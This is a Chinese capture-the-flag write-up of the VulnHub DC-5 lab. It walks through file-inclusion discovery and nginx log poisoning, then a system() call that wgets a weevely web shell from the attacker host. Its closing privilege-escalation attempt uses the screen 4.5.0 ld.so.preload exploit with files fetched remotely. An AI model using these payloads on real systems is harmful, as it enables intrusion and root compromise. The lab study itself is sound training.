综合实战第二章-DC-5


综合实战第二章

DC-5

环境准备

靶场下载:https://www.vulnhub.com/?page=2&q=dc

攻击机:

kali 192.168.3.134

win7 192.168.3.137

靶机:DC-5 192.168.3.166

信息搜集

枯燥乏味的信息搜集

nmap -p- -A 192.168.3.166

image-20220501110232344

访问80端口看看有什么有用的信息

image-20220501111034039

在这里可以提交表单看一下

image-20220501111106416

发现这玩意会随着刷新而变化

image-20220501111131243

抓包看看

image-20220501150840499

穷举一下看看有哪些文件名

把他扔到intrude里

payload选择filenames-short和filenames-long

image-20220502103240049

开始穷举

扫到这些玩意

image-20220502103457179

发现footer页面

image-20220502103641356

每次刷新他都会变,说明之前的页面可能调用了footer

继续抓包,对参数进行穷举

image-20220502103937407

设置两个参数

image-20220502104050301

模式选择这个

image-20220502104125682

第一个攻击载荷选择filename-short和filename-long

image-20220502104307938

第二个攻击载荷选择fuzzing-full

image-20220502104351774

穷举出来前面的名字是file

image-20220502104435202

再次进行抓包,这次对file后面的信息进行破解

image-20220502104604033

payload选择fuzzing-full

image-20220502104633865

与众不同的东西就出来了,访问看一下

image-20220502104658010

image-20220502104751528

出现漏洞

漏洞利用

进入kali,在kali中打开burpsuite

访问日志文件

http://192.168.3.166/thankyou.php?file=/var/log/nginx/access.log

image-20220502105408133

此时我们随便构造一个链接

192.168.3.166/test1

image-20220502105507490

访问,然后在日志里搜索

image-20220502105544758

也就是说,我们可以构造一句话木马

抓包

构造一句话木马

GET /test1!   HTTP/1.1

image-20220502110046714

回到日志里查看一下

image-20220502110204526

后面没跟东西,此时我们做一下测试

http://192.168.3.166/thankyou.php?file=/var/log/nginx/access.log&a=phpinfo();

image-20220502110328002

成功打开phpinfo

把这个包抓到burpsuite里,扔到repeater里备用

上传木马

准备构造木马

weevely generate 123456 dcmuma.php

然后打开httpserver

python -m SimpleHTTPServer

做完这些后,打开burpsuite,拿出我们之前抓到的包

构造参数

GET /thankyou.php?file=/var/log/nginx/access.log&a=system('cd /tmp;wget http://192.168.3.134:8000/dcmuma.php;chmod +x dcmuma.php'); HTTP/1.1

image-20220502112130409

可以看到上传成功

image-20220502112201319

进行测试

weevely http://192.168.3.166/thankyou.php?file=/tmp/dcmuma.php 123456

image-20220502112343036

成功连接

提权

查找有啥玩意能够进行提权

find / -perm -4000 2>/dev/null

image-20220502112903058

找到一个这玩意,可以看看有没有什么漏洞可以利用

searchsploit screen 4.5.0 

image-20220502113019380

先拷贝一下

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh 
cp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.txt

先看一下这俩玩意里面有啥

就以41154.sh来看,按照里面的步骤做就好

新建一个libhax.c

把第一段复制过去

然后按照里面的命令执行就好

gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c

剩下都按照步骤做完就好

最后新建一个runme.sh

然后把最后一段复制进去

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

然后把这些玩意都传上去

wget http://192.168.3.134:8000/libhax.so
wget http://192.168.3.134:8000/rootshell
wget http://192.168.3.134:8000/runme.sh

然后运行

./runme.sh

提权失败,白瞎拉到


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录